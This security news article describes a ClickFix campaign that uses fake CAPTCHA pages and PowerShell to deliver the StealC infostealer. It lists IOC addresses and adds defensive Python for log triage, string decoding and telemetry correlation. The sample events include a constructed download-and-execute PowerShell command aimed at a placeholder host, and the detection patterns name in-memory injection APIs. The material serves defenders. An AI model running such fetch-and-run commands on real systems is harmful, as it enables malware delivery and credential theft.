GBHackers

New ClickFix Attack Wave Targets Windows Systems to Deploy StealC Stealer


A new wave of ClickFix attacks is targeting Windows users with fake Cloudflare-style CAPTCHA verification pages that trick victims into executing malicious PowerShell commands.

This campaign delivers a multi-stage, fileless infection chain that ends with StealC, a powerful information stealer capable of harvesting credentials, cryptocurrency wallets, gaming accounts, emails, and detailed system fingerprints.

The operation relies on social engineering rather than software exploits, making it especially dangerous for organizations that rely solely on technical controls.

The campaign begins when users browse to a compromised website, where injected JavaScript silently loads a fake Cloudflare verification page that resembles a standard CAPTCHA or Turnstile check.

The victim visited madamelam.com, a Vietnamese restaurant’s website that had been compromised by threat actors.

The compromised website loads a malicious script (Source : LevelBlue).

When the user clicks “verify,” the page surreptitiously copies a prebuilt PowerShell command to the clipboard, instructing them to press Windows Key + R, paste with Ctrl + V, and press Enter, presenting this as a required security step.

ClickFix Attack Wave

The PowerShell command then runs in-memory, using Invoke-WebRequest-style functionality to pull a loader script from attacker-controlled infrastructure without writing a traditional executable to disk.

Fake CAPTCHA page (Source : LevelBlue).

Once executed, the Stage 1 PowerShell loader connects to a remote IP such as 91.92.240.219 to download and run shellcode directly in memory.

This script allocates executable memory, copies the shellcode into the allocated region, and starts a new thread to execute it, relying on dynamic API resolution via .NET reflection to call low-level Windows APIs from PowerShell.

The loader employs fileless execution, direct memory manipulation, and thread-based execution to bypass many endpoint security controls that focus on disk artifacts or traditional process trees.
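Script Block Logging (Event ID 4104) is the control that makes this stage visible even though nothing touches disk. The following is an added example, not code from LevelBlue or GBHackers: a small triage routine that scores logged script blocks against the behaviours described above (remote download, in-memory execution, executable memory allocation, thread creation, .NET reflection to reach Win32 APIs). The indicator weights and the three sample events are constructed for illustration; the "malicious" samples are non-functional fragments that only contain the indicator strings.

```python
"""Triage PowerShell script block logs (Event ID 4104) for fileless-loader indicators.

Added example, not code from the LevelBlue/GBHackers write-up. Log entries and
indicator weights below are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# (name, pattern, weight). Weights are an assumption chosen for this example.
INDICATORS = [
    ("web_download", re.compile(r"Invoke-WebRequest|iwr\b|DownloadString|DownloadData|Net\.WebClient", re.I), 2),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("exec_memory_alloc", re.compile(r"VirtualAlloc|VirtualProtect", re.I), 3),
    ("thread_exec", re.compile(r"CreateThread|CreateRemoteThread|QueueUserAPC", re.I), 3),
    ("dynamic_api_resolution", re.compile(r"GetProcAddress|GetModuleHandle|GetDelegateForFunctionPointer|DefineDynamicAssembly", re.I), 3),
    ("raw_memory_copy", re.compile(r"Marshal\]::Copy|Marshal::Copy", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I), 1),
]


@dataclass
class ScriptBlockEvent:
    record_id: int
    user: str
    script: str  # the ScriptBlockText field of the 4104 event


def score_script_block(script: str) -> tuple[int, list[str]]:
    """Return (total weight, matched indicator names) for one script block text."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(script)]
    total = sum(w for name, _, w in INDICATORS if name in hits)
    return total, hits


def triage(events: list[ScriptBlockEvent], threshold: int = 4):
    """Return (record_id, user, score, hits) for events at or above the threshold, highest first.

    A threshold of 4 catches the Stage 1 pattern (download plus in-memory execution)
    while a single matched indicator alone does not fire.
    """
    flagged = []
    for ev in events:
        total, hits = score_script_block(ev.script)
        if total >= threshold:
            flagged.append((ev.record_id, ev.user, total, hits))
    return sorted(flagged, key=lambda r: r[2], reverse=True)


# Constructed sample events, not real captured script blocks. Record 103 is a
# deliberately incomplete fragment that only carries the indicator strings.
SAMPLE_EVENTS = [
    ScriptBlockEvent(101, "CORP\\alice",
                     "Get-ChildItem C:\\Reports | Where-Object Length -gt 1MB | Export-Csv big.csv"),
    ScriptBlockEvent(102, "CORP\\bob",
                     "$r = Invoke-WebRequest http://placeholder.invalid/loader; IEX $r.Content"),
    ScriptBlockEvent(103, "CORP\\carol",
                     "... 'VirtualAlloc' ... GetDelegateForFunctionPointer ... "
                     "[Marshal]::Copy($buf, 0, $ptr, $buf.Length) ... 'CreateThread' ..."),
]

if __name__ == "__main__":
    for record_id, user, score, hits in triage(SAMPLE_EVENTS):
        print(f"record {record_id} ({user}) score={score} hits={hits}")
```

The point of scoring rather than matching a single keyword is that `Invoke-WebRequest` on its own is everyday administration, whereas download plus `IEX`, or `VirtualAlloc` plus `GetDelegateForFunctionPointer` plus a thread-creation call inside one script block, is the combination the article describes and is rare in legitimate scripts.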

The downloaded shellcode, identified as cptch.bin, is a 32‑bit position‑independent payload generated with the Donut framework, which is designed to convert PE files into shellcode for in‑memory execution.

Detect It Easy analysis revealing cptch.bin as position-independent shellcode (Donut loader) with embedded payload (Source : LevelBlue).

Donut embeds a full Windows executable inside the shellcode, enabling reflective PE loading: the malware parses the PE headers, allocates memory for the full image, applies relocations, resolves imports, and then transfers control to the embedded PE’s entry point, all without using the normal Windows loader.

The campaign is notable for combining ClickFix social engineering, fileless PowerShell loaders, Donut-based shellcode, reflective PE loading, and process injection into a single chain.

This technique allows the actors to load a 64‑bit downloader component completely in memory, further reducing forensic traces and avoiding conventional signature-based detection.

StealC Stealer Malware

The reflectively loaded Stage 3 component is a 64‑bit downloader and injector whose purpose is to retrieve the final StealC payload and inject it into a legitimate Windows process such as svchost.exe.

It connects to a URL like http://94.154.35.115/user_profiles_photo/cptchbuild.bin using a custom User‑Agent set to “Loader,” downloads the StealC binary, and allocates memory inside the target process to write and execute the code via a remote thread.

By terminating itself after injection, the downloader minimizes evidence on disk and leaves StealC running under the identity of a trusted system process.

StealC itself is a 64‑bit information stealer, compiled with Microsoft Visual C++, and distributed through a builder-based malware-as-a-service ecosystem.

It uses Base64 plus RC4 encryption to obfuscate embedded strings, with a hardcoded key for static data and a separate build ID used as the RC4 key for C2 traffic over HTTP.
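For an analyst pulling strings or C2 bodies out of a sample, the Base64-then-RC4 scheme is straightforward to reverse once the key is known. The block below is an added example, not StealC's own code and not LevelBlue's: a plain RC4 implementation and a decoder for the string layer. The key and the encoded samples are constructed for illustration; with a real sample the static key (or, for traffic, the build ID) has to be recovered from the binary first. The same `rc4` routine applies to both layers, since the article states the build ID is simply used as the RC4 key for C2 traffic.

```python
"""Decode Base64-then-RC4 obfuscated strings, the layering the article attributes to StealC.

Added example, not StealC's or LevelBlue's code. The key and the samples below
are constructed; a real key must be recovered from the analysed binary.
"""
import base64


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation, XOR keystream
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_string(key: bytes, blob: str) -> str:
    """Base64-decode, then RC4-decrypt, one obfuscated string."""
    return rc4(key, base64.b64decode(blob)).decode("utf-8", errors="replace")


def encode_string(key: bytes, plain: str) -> str:
    """Inverse of decode_string; used here only to build the constructed samples."""
    return base64.b64encode(rc4(key, plain.encode("utf-8"))).decode("ascii")


def decode_all(key: bytes, blobs: list) -> list:
    """Decode a list of obfuscated strings, e.g. a dumped string table."""
    return [decode_string(key, b) for b in blobs]


# Placeholder key, not a real StealC key.
CONSTRUCTED_KEY = b"example-static-key"

# Constructed string table: typical stealer target paths, encoded with the placeholder key.
CONSTRUCTED_PLAINTEXTS = ["\\Google\\Chrome\\User Data\\", "Login Data", "wallet.dat"]
CONSTRUCTED_BLOBS = [encode_string(CONSTRUCTED_KEY, s) for s in CONSTRUCTED_PLAINTEXTS]

if __name__ == "__main__":
    for blob, plain in zip(CONSTRUCTED_BLOBS, decode_all(CONSTRUCTED_KEY, CONSTRUCTED_BLOBS)):
        print(f"{blob} -> {plain!r}")
```

Because RC4 is symmetric, the same function verifies a recovered key: decrypting a dumped string table with the wrong key yields non-printable noise, while the right key yields readable paths such as the ones in the constructed table.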

Once active, StealC targets Chromium and Firefox-based browsers, numerous cryptocurrency wallet extensions and desktop wallets, Steam configuration files, Outlook profiles, system fingerprints, screenshots, and arbitrary documents and database files, staging all stolen data in structured directories before exfiltration to a C2 endpoint such as 91.92.240.190.

StealC installs no persistence and can optionally delete itself after the theft, so defenders have only a narrow response window. That underscores the need for user awareness around fake verification prompts, strict PowerShell logging, and behavioral monitoring of clipboard abuse, outbound network connections, and unusual PowerShell-to-svchost process relationships.
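The two behavioral signals the article calls out, a PowerShell process spawned from the Run dialog with download or in-memory flags and that same process creating a thread inside svchost.exe, can be correlated from ordinary endpoint telemetry, and the network side can be matched against the IOC table below. The following is an added example, not LevelBlue's or GBHackers' code: the event shapes mimic Sysmon (Event 1 process creation, Event 8 CreateRemoteThread) and a generic proxy log, but every record is constructed. The IOC IPs and the "Loader" User-Agent come from the article; the placeholder URLs and TEST-NET addresses do not.

```python
"""Correlate endpoint and proxy telemetry for the ClickFix-to-StealC chain described in the article.

Added example, not LevelBlue's or GBHackers' code. Event shapes mimic Sysmon
Event 1 / Event 8 and a generic proxy log; all records here are constructed.
"""
from __future__ import annotations

# From the article's IOC table.
IOC_IPS = {"94.154.35.115", "91.92.240.219", "178.16.53.70", "91.92.240.190"}
IOC_USER_AGENT = "Loader"  # custom User-Agent the Stage 3 downloader sets, per the article

# Command-line fragments that indicate a download or in-memory execution.
LAUNCH_MARKERS = ("invoke-webrequest", "iwr ", "iex", "downloadstring", "-w hidden", "http")


def flag_process_event(ev: dict) -> str | None:
    """explorer.exe -> powershell.exe with download/in-memory flags is the ClickFix launch."""
    if ev.get("EventID") != 1:
        return None
    parent = ev["ParentImage"].lower()
    image = ev["Image"].lower()
    cmd = ev.get("CommandLine", "").lower()
    if parent.endswith("explorer.exe") and image.endswith("powershell.exe"):
        if any(marker in cmd for marker in LAUNCH_MARKERS):
            return f"clickfix_launch: pid {ev['ProcessId']} explorer.exe -> powershell.exe"
    return None


def flag_remote_thread(ev: dict) -> str | None:
    """PowerShell creating a thread inside svchost.exe matches the injection step."""
    if ev.get("EventID") != 8:
        return None
    src = ev["SourceImage"].lower()
    tgt = ev["TargetImage"].lower()
    if src.endswith("powershell.exe") and tgt.endswith("svchost.exe"):
        return f"remote_thread_into_svchost: pid {ev['SourceProcessId']} -> pid {ev['TargetProcessId']}"
    return None


def flag_proxy_record(rec: dict) -> str | None:
    """Match destination IPs against the IOC table, then the downloader's User-Agent."""
    if rec["dst_ip"] in IOC_IPS:
        return f"ioc_ip: {rec['src_ip']} -> {rec['dst_ip']}"
    if rec.get("user_agent") == IOC_USER_AGENT:
        return f"ioc_user_agent: '{IOC_USER_AGENT}' from {rec['src_ip']} to {rec['dst_ip']}"
    return None


def analyse(process_events: list[dict], proxy_records: list[dict]) -> list[str]:
    """Return alerts; escalate when the launching PowerShell pid later injects into svchost."""
    alerts: list[str] = []
    launched_pids: set[int] = set()
    for ev in process_events:
        launch = flag_process_event(ev)
        if launch:
            launched_pids.add(ev["ProcessId"])
            alerts.append(launch)
        inject = flag_remote_thread(ev)
        if inject:
            alerts.append(inject)
            if ev["SourceProcessId"] in launched_pids:
                alerts.append(f"chain_confirmed: pid {ev['SourceProcessId']} launched via ClickFix then injected into svchost.exe")
    alerts.extend(a for a in (flag_proxy_record(r) for r in proxy_records) if a)
    return alerts


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed endpoint events (not real telemetry).
PROCESS_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr http://placeholder.invalid/x | iex"'},
    {"EventID": 1, "ProcessId": 5000, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell -NoExit -Command Get-Process"},
    {"EventID": 8, "SourceProcessId": 4120, "SourceImage": PS,
     "TargetProcessId": 1234, "TargetImage": "C:\\Windows\\System32\\svchost.exe"},
]

# Constructed proxy records; 203.0.113.10 and 198.51.100.7 are TEST-NET placeholders.
PROXY_RECORDS = [
    {"src_ip": "10.0.0.5", "dst_ip": "203.0.113.10", "user_agent": "Mozilla/5.0"},
    {"src_ip": "10.0.0.5", "dst_ip": "198.51.100.7", "user_agent": "Loader"},
    {"src_ip": "10.0.0.5", "dst_ip": "91.92.240.190", "user_agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for alert in analyse(PROCESS_EVENTS, PROXY_RECORDS):
        print(alert)
```

The `chain_confirmed` alert is the one worth paging on: a hidden PowerShell started from explorer.exe is suspicious but common in helpdesk scripts, and a thread created in svchost.exe has benign sources, but the same pid doing both in sequence is the article's injection chain and, given the absence of persistence, the host should be isolated before StealC finishes exfiltration.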

Indicators of Compromise (IOCs)

Category     Indicator                                                    Description
IP Address   94.154.35.115                                                Stage 2 payload delivery
IP Address   91.92.240.219                                                PowerShell loader
IP Address   178.16.53.70                                                 PowerShell loader
IP Address   91.92.240.190                                                StealC C2 server
URL          hxxp[:]//94.154.35.115/user_profiles_photo/cptch.bin         Stage 2 payload file
URL          hxxp[:]//94.154.35.115/user_profiles_photo/cptchbuild.bin    Additional payload file
URL          hxxp[:]//91.92.240.219/                                      PowerShell loader host
URL          hxxp[:]//91.92.240.190/fbfde0da45a9450b.php                  StealC command-and-control endpoint
URL          hxxps[:]//goveanrs.org/jsrepo                                Suspicious JavaScript-hosting domain
URL          hxxps[:]//madamelam.com                                      Potential malicious redirect or payload domain
